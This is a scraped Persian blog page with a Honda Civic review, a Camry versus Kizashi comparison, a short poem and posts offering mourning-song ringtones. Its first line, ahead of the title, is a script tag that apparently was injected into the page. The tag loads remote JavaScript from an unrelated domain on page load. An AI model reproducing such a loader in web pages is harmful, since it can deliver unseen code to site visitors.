script type="text/javascript" src="http://7vps.ir/img/website.js"> مقایسه هوندا سیویک ۲۰۱۳ و سوزوکی کیزاشی
کافی نت
وبلاگی جذاب
مقایسه هوندا سیویک 2013 و سوزوکی کیزاشی

مقایسه هوندا سیویک ۲۰۱۳ و سوزوکی کیزاشی

Honda Civic

سیویک ۲۰۱۳

مقایسه هوندا سیویک ۲۰۱۳ و سوزوکی کیزاشی
هوندا سیویک را میتوان محبوب ترین خودرو کلاس خودش در بین جوانان دانست زیرا به شدت خودرو جذابی میباشد . طراحی ظاهری هوندا سیویک مجذوب کننده ، هماهنگ و زیبا است . در نمای جانبی سیویک یک خط سر تا سری دارد که از چراغ جلو تا صندوق عقب کشیده شده است و زیبایی نمای این قسمت را دو چندان کرده است . در قسمت عقب سیویک هم فرم چراغ ها ، شکل سپر و طراحی زیبای صندوق عقب چهره ای به شدت خیره کننده و جذاب به سیویک بخشیده است . در داخل کابین هوندا سیویک هم مانند نمای ظاهری طراحی اش بسیار زیبا ، مدرن و جذاب میباشد . داشبورد سیویک در قسمت میانی راننده محور است و فاصله زیادی هم با شیشه جلو دارد که بسیار خاص و جذاب میباشد .  اکثریت نشانگرهای هوندا سیویک الکترونیکی میباشد و کمتر عقربه آنالوگی در پشت آمپر سیویک مشاهده میکنید که برای راننده  جذابیت خاصی را به ارمغان آورده است . درون کابین هوندا سیویک از بهترین متریال استفاده شده است و کیفیت ساخت و مونتاژ هم بسیار بالاست . از نظر امکانات هم در هوندا سیویک هر آنچه که برای خودرویی در این کلاس نیاز است را میتوانید بیابید که با بهترین کیفیت و عملکرد شما را شگفت زده میکند . در بحث ابعاد هم هوندا سیویک جادار ترین خودروی کلاس خود میباشد .
قلب تپنده هوندا سیویک ۴ سیلندر میباشد ، ۱۸۰۰ سی سی حجم دارد و از سری I-VTEC است . هوندا سیویک با تکیه بر این پیشرانه ۱۴۰ اسب بخار قدرت و ۱۷۷ نیوتن متر گشتاور تولید میکند . بازدهی پیشرانه هوندا سیویک بسیار بالاست زیرا شتاب و کشش بسیار خوبی دارد ، استهلاکش بسیار پایین است و مصرف سوختش هم کاملا اقتصادی میباشد . برای انتقال قدرت سیویک به چرخهایش از یک گیربکس ۵ سرعته اتوماتیک استفاده شده است که فقط میتوان گفت عملکردش عالی است و با موتور هماهنگی کامل دارد . شما از این همه دقت و کیفیت در تعویض دنده سیویک کاملا شگفت زده خواهید شد .

کیفیت رانندگی با هوندا سیویک فوق العاده است و هندلینگ بی نظیری دارد و تنها با یک بار راندن سیویک عاشقش میشوید . عملکرد سیستم تعلیق هوندا سیویک فوق العاده است ، فرمان پذیری و دقت فرمانش حرف ندارد و ترمزهایش به شما اطمینان حرکت با هر سرعتی را میدهد .

به عنوان کلام پایانی هوندا سیویک را میتوان فوق العاده ترین انتخاب شما در این کلاس با توجه به بودجه دانست . در کنار این همه خوبی و نقاط مثبت سیویک یکی از نکات قابل تامل این خودرو هم قهر بودنش با تعمیرگاه است . شاید تنها ایراد هوندا سیویک را در این دانست که حتی با یک بار لمس تجربه رانندگیش شیفته و عاشق آن میشوید .

باید بخوانید:  هوندا NSX مدل 2017 قیمت گذاری شد
بازار خودروهای وارداتی به قدری داغ شده که همه ساله مردم چشم به راه خودرویی جدید و یا نسل جدیدی از خودروهای موجود در بازار هستند. در این میان کره ای ها و ژاپنی ها سهم بیشتری در بازار داشته و تعداد خودروهای آنها در خیابان به دیگر برندها می چربد. دیگر شرکت های خودروساز داخلی نیز در این میان بی کار نبوده و سعی در عرضه خودروهای لوکس خارجی دارند که البته این خودروها در چرخه تولید قرار داشته و خرید آن ها نیز موجب رونق اقتصاد کشور می شود. این خودروهای لوکس تولیدی را می توان در جاده مخصوص کرج بیشتر از هر جای دیگری مشاهده کرد.

camry-kizashi تویوتا کمری و سوزوکی کیزاشی

ایران خودرو بزرگ ترین خودروساز خاورمیانه چند سالی است که به تولید خودروهای مختلف برند ژاپنی سوزوکی روی آورده است. در ابتدا با تولید مدل گرند ویتارا این همکاری را آغاز کرد و حالا با خودرویی در کلاس سواری است. کیزاشی که در آینده بیشتر از آن خواهیم شنید، در کلاس D سواری ها قرار دارد کلاسی که به سدان های خانوادگی نیمه لوکس تعلق دارد و در این کلاس نیز رقیبی ژاپنی انتظار کیزاشی را می کشد؛ تویوتا کمری که سال هاست در بازار ایران به فروش می رسد و یکی از موفق ترین ها در این کلاس به حساب می آید. در این گزارش رقابتی ژاپنی را شاهد هستیم. دو خودرویی که یکی از شرق و دیگری از غرب تهران به خیابان ها فرستاده می شوند.

suzuki-kizashi1سوزوکی کیزاشی

کیزاشی با موتور چهار سیلندر ۲٫۴ لیتری روانه بازار ایران می شود. این موتور قادر است در ۶۵۰۰ دور بر دقیقه ۱۸۵ اسب بخار قدرت تولید کرده و در چهار هزار دور بر دقیقه ۲۳۰ نیوتن متر گشتاور را ارائه دهد. وظیفه انتقال نیرو در این خودرو به عهده گیربکس CVT است که در داشتن مصرف سوخت پایین این خودرو نقشی تاثیر گذار دارد. البته کیزاشی در ایران با گیربکس شش سرعته دستی نیز عرضه می شود. این خودرو برای اولین بار در سال ۲۰۰۹ راهی بازار شد و توانست در نیوزیلند و استرالیا فروش خوبی را تجربه کند. کیزاشی قادر است در مدت زمان ۸٫۸ ثانیه با گیربکس CVT از حالت ایستاده به سرعت ۱۰۰ کیلومتر بر ساعت برسد که این زمان با گیربکس دستی حدود یک ثانیه کاهش می یابد. کیزاشی می تواند تا ۲۱۵ کیلومتر بر ساعت نیز سرعت بگیرد که برای خودرویی با این حجم مناسب است. این خودرو در سیکل ترکیبی حدود ۷٫ ۹ لیتر در ۱۰۰ کیلومتر بنزین مصرف می کند که این مصرف پایین را مدیون گیربکس CVT پیشرفته خود است.
باید بخوانید:  سال 2020 و خودروی اسپورت الکتریکی نیسان

2012-toyota-camry-2-5-auto-se-sedan-angular-rear۲۰۱۲ Toyota Camry

تویوتا کمری

کمری که این روزها نسل جدید خود را در خیابان های تهران می بیند و البته تعداد آنها زیاد نیست، در ایران قدمت زیادی دارد و تاکنون دو نسل از آن راهی بازار ایران شده است. این خودرو از موتوری چهار سیلندر به حجم ۲۴۹۴ سی سی بهره می برد. موتوری که قادر است در ۶۰۰۰ دور بر دقیقه ۱۸۱ اسب بخار قدرت تولید کند و ۲۳۵ نیوتن متر گشتاور را در ۴۱۰۰ دور بر دقیقه ارائه دهد. وظیفه انتقال قدرت در این خودرو به عهده گیربکس چهار سرعته اتوماتیک است. کمری قادر است در مدت زمان۹٫۶ ثانیه از حالت سکون به سرعت ۱۰۰ کیلومتر بر ساعت برسد و تا ۲۰۵ کیلومتر نیز سرعت بگیرد. مصرف سوخت این ژاپنی ضعیف در سیکل ترکیبی حدود۸٫۲  لیتر در ۱۰۰ کیلومتر است که البته باک ۷۰ لیتری این خودرو به خوبی پاسخ گوی این مقدار مصرف خواهد بود.

طراحی

کیزاشی از طراحی به روز و زیبایی بهره می برد. خودرویی که هم می توان در چهره آن حالت های اسپرت را دید هم این که طراحی با وقاری دارد و در کل می توان چهره آن را عامه پسند دانست. این خودرو در مقابل کمری قرار دارد که هیچ نشانی از یک خودروی اسپرت در آن دیده نمی شود و بیشتر یک خودروی خانوادگی می نماید. در داخل کابین نیز هر دو خودرو طراحی قابل قبولی را ارائه می دهند. با این تفاوت که نور پردازی در کیزاشی چشم نوازتر و زیباتر از کمری است. صندلی های راحت و فضای کافی برای سرنشینان نیز از خصیصه های دو خودرو به شمار رفته با این تفاوت که در کابین کیزاشی می توان امکانات بیشتری را پیش رو دید.تویوتا کمری از امکاناتی همچون جلو دیسکی خنک شونده و عقب دیسکی – راننده و سرنشین جلودر کل دو عدد – ایموبیلایزر، قفل مرکزی، ریموت کنترل، رادیو و پخش CD و چهار بلندگو، بلوتوث و چنجر شش تایی سفارشی، تهویه مطبوع دستی، تنظیم برقی صندلی راننده، تنظیم برقی گودی کمر، تنظیم برقی آیینه ها، شیشه بالابر جلو و عقب برقی، چراغ های جلوی هالوژنی و کروز کنترل بهره مند است.
باید بخوانید:  پیشرانه سه سیلندر هوندا
کیزاشی از امکانات بیشتری نسبت به کمری برخوردار است که می توان به صندلی راننده (۱۰ حرکت) و سرنشین (چهار حرکت) با تنظیم برقی، صندلی راننده دارای سه حافظه تنظیم اتوماتیک، روکش صندلی ها و تودوزی چرمی، گرم کن صندلی راننده و سرنشین، صندلی عقب تاشونده، چرخ زاپاس مطابق با چرخ اصلی، ترمز جلو دیسکی تهویه شونده، ترمز عقب دیسکی، ترمز ضد قفل ABS با توزیع الکترونیکی نیرو EBD، سیستم کمکی ترمز ABS، برنامه پایداری الکترونیکی (ESP)، آیینه های جانبی با تنظیم برقی و تاشونده برقی، آیینه وسط الکتروکرومیک (حساس به نور)، هفت عدد کیسه هوا، قفل مرکزی و ورود بدون کلید، کلید روشن / خاموش خودرو، سیستم کمک پارک جلو و عقب، برف پاک کن اتوماتیک مجهز به حسگر باران، سیستم ضدسرقت ایموبیلایزر، سیستم یک پارچه نمایش اطلاعات و مدیریت پیمایش، سقف شیشه ای برقی دارای ضد خرج کردن اهرم های دوگانه تعویض دنده روی فرمان، (شیفت تعطیل) سیستم تثبیت سرعت (کروز کنترل)، تهویه مطبوع اتوماتیک دو منطقه ای، مجرای تهویه و انتقال گرمایش برای سرنشینان عقب، روکش چرم فرمان، فرمان هیدرولیک تلسکوپی با قابلیت تنظیم ارتفاع، کنترل نمایشگر اطلاعات و مدیریت پیمایش وکنترل سیستم تثبیت سرعت اشاره داشت.

نتیجه گیری

کیزاشی یک تازه وارد به بازار ایران است که در حدود ۶۵ تا ۷۰ میلیون تومان قیمت دارد. خودرویی که با داشتن موتوری قوی تر نسبت به کمری و داشتن گیربکس CVT و همچنین امکانات زیاد می تواند بازار خودرویی همچون کمری را به مخاطره بیندازد. تویوتا کمری نیز قیمتی در حدود ۷۰ میلیون تومان دارد و با توجه به داشتن امکانات کم و موتوری کم بازده که قدرت زیادی را ارائه نمی دهد حرف های زیادی برای گفتن در مقابل کیزاشی تازه وارد ندارد. به خصوص این که کیزاشی نیز خودرویی ژاپنی بوده و از نظر کیفیت و دوام در سطح بالایی قرار دارد.

camry-kizashi_rearکمری و کیزاشی

مزایای کیزاشی: طراحی اسپورت، سادگی کار با تجهیزات، هندلینگ و مانور خوب، قیمت پایینتر در برابر رقبا (حدود هزار دلار ارزانتر از نمونه مشابه کمری)، عایق مناسب بدنه و سروصدای کم کابین معایب کیزاشی: سروصدای موتور مخصوصا با گیربکس CVT، مصرف سوخت بیشتر، فضای محدود سر در مدلهای دارای سانروف، بازتاب نور روی صفحه نمایش و اطلاعات محدود قابل نمایش روی آن مزایای کمری: داشبورد ساده و زیبا، ایمنی بالا با ۱۰ ایربگ استاندارد (نمونه های وارداتی به ایران تنها با دو ایربگ!)، تولید مدلهای هیبریدی با مصرف سوخت بسیار پایین، فضای داخلی بیشتر معایب کمری: صندلیهای جلو فاقد محافظ طرفین، رانندگی بدون هیجان، طراحی ظاهری متوسط در نسل جدید

   

Tags:



دو شنبه 19 مهر 1395برچسب:مقایسه هوندا سیویک 2013 و سوزوکی کیزاشی , :: 11:7 قبل از ظهر
گری گوری

خوب ببین
زندگی زیباست
رنگارنگ است
روزها خوبند
ماه ها بهترند
و سالها عالی ترند
می گذرند



سه شنبه 29 بهمن 1392برچسب:, :: 3:33 بعد از ظهر
گری گوری

 

دو کلیپ تصویری مداحی موبایل Maddahi 3gp Video

نوشته شده توسط در تاریخ پنجشنبه، 3 دی ماه 1388
 
madahiclip.jpg
وب سایت میهن دانلود دو کلیپ مداحی زیبا برای شما عزیزان آماده کرده است، این دو کلیپ تصویری با فرمت 3gp بوده و قابلیت پخش در کلیه گوشی های موبایل را دارد. این دو کلیپ گلچینی از :
- مداحی آذری ابوالفضل ، ابوالفضل از حاج سلیم موذن زاده
- مداحی ارباب حسین از کربلایی حمید علیمی
می باشد و هر دو کلیپ در یک فایل فشرده در ادامه مطلب آماده دریافت است.
ادامه مطلب+Download

 

 

مجموعه پنج مداحی کوتاه mp3 مخصوص زنگ موبایل

نوشته شده توسط در تاریخ شنبه، 28 آذر ماه 1388
madahi.jpg
به مناسبت فرا رسیدن ماه محرم و ایام سوگواری سایت میهن دانلود اقدام به قرار دادن مداحی های کوتاه مخصوص زنگ موبایل کرده است. این مجموعه مداحی زنگ موبایل که دارای پنج مداحی کوتاه می باشد آثاری از مداحی های حاج محمود کریمی می باشد و با فرمت mp3 با کیفیت خوب هستند ، هم اکنون این پنج مداحی زنگ موبایل را می توانیید از وبسایت میهن دانلود در قالب یک فایل فشرده دریافت کنید 
ادامه مطلب+Download

 



ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 151
بازدید دیروز : 0
بازدید هفته : 243
بازدید ماه : 9275
بازدید کل : 139426
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس